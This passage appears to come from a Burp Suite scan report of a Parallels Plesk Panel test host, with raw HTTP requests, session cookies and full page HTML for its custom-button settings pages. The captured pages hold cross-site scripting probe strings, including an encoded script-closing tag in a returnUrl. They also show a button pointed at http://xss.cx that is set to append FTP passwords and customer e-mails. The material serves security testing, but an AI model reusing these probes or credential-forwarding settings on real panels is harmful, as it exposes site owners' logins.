renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@2/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="inject" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="fdf080d92960a97399f5295d" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="2">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@3/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/custom-buttons/custom-button@3/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:20:50 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:20:51 GMT
Connection: close
Content-Length: 17813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@3/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="XSS.CX" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="http://xss.cx" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="3">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:19:08 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:19:08 GMT
Connection: close
Content-Length: 18025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/wizard.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
